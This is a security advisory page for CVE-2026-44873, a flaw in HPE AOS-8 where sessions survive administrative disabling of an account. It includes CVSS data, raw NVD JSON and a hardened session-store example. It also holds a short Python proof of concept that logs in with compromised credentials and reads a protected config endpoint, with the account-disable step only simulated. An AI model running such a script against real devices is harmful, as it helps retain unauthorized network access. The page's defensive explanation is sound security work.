Security Vulnerability Report
CVE-2026-44873 CVSS 5.4 MEDIUM

CVE-2026-44873

Published: 2026-05-12 20:16:46
Last Modified: 2026-05-12 20:16:46

Description

A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HPE AOS-8 (for the specific affected versions, refer to the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Proof of Concept for CVE-2026-44873
# This script demonstrates that a session remains valid after account disablement.

TARGET_URL = "https://aos-8-device.example.com/api"

# Attacker obtains credentials and logs in
session = requests.Session()
login_data = {"username": "victim_user", "password": "compromised_pass"}
response = session.post(f"{TARGET_URL}/login", data=login_data)

if response.status_code == 200:
    print("[+] Login successful. Session established.")
    print(f"[+] Session Cookie: {session.cookies.get_dict()}")

    # Simulate Administrator disabling the account 'victim_user'
    # In a real scenario, this happens externally or via another admin session
    print("\n[!] Simulating: Administrator disables 'victim_user' account...")

    # Attacker attempts to access a protected resource using the existing session
    # Vulnerable system allows this because it doesn't check account status against active sessions
    protected_resource = session.get(f"{TARGET_URL}/network/config")
    if protected_resource.status_code == 200:
        print("[+] Exploit successful! Access retained despite account being disabled.")
        print(f"[+] Data leaked: {protected_resource.text[:100]}...")
    else:
        print("[-] Access denied. Session was invalidated.")
else:
    print("[-] Login failed.")
```
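As an added example (not part of this advisory and not HPE's AOS-8 code), the following minimal session store contrasts the pattern the description names, where disabling an account leaves its live sessions valid until they expire, with a hardened one that revokes the account's sessions at disable time and re-checks account status on every request. All names here (SessionStore, disable_account_hardened, authorize_hardened) are hypothetical.

```python
import secrets
import time


class SessionStore:
    """Toy in-memory account/session store (hypothetical; for illustration only)."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self.accounts = {}  # username -> {"enabled": bool}
        self.sessions = {}  # token -> {"user": str, "expires": float}

    def create_account(self, user):
        self.accounts[user] = {"enabled": True}

    def login(self, user):
        # Only enabled accounts may open a session.
        if not self.accounts.get(user, {}).get("enabled"):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = {"user": user, "expires": time.time() + self.ttl}
        return token

    def disable_account_vulnerable(self, user):
        # Flips the flag only; every live session keeps working until it expires.
        self.accounts[user]["enabled"] = False

    def disable_account_hardened(self, user):
        # Flip the flag AND revoke every session bound to that account.
        self.accounts[user]["enabled"] = False
        for token in [t for t, s in self.sessions.items() if s["user"] == user]:
            del self.sessions[token]

    def authorize_vulnerable(self, token):
        # Checks only that the token exists and has not expired.
        s = self.sessions.get(token)
        return s is not None and s["expires"] > time.time()

    def authorize_hardened(self, token):
        # Re-checks account status on every request, so a session that survived
        # revocation is still refused once the account is disabled.
        s = self.sessions.get(token)
        if s is None or s["expires"] <= time.time():
            return False
        return bool(self.accounts.get(s["user"], {}).get("enabled", False))
```

A real deployment also needs the revocation to reach every node that validates sessions (shared store or broadcast), or the per-request status check is the only guarantee.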

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44873",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T20:16:45.907",
    "lastModified": "2026-05-12T20:16:45.907",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A session management vulnerability in AOS-8 allows previously authenticated users to retain network access after their accounts are administratively disabled. Existing sessions are not invalidated when credentials are revoked, enabling continued access until session expiration. An attacker with compromised credentials could exploit this behavior to maintain unauthorized access even after the account has been disabled."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "references": [
      {
        "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US",
        "source": "[email protected]"
      }
    ]
  }
}
```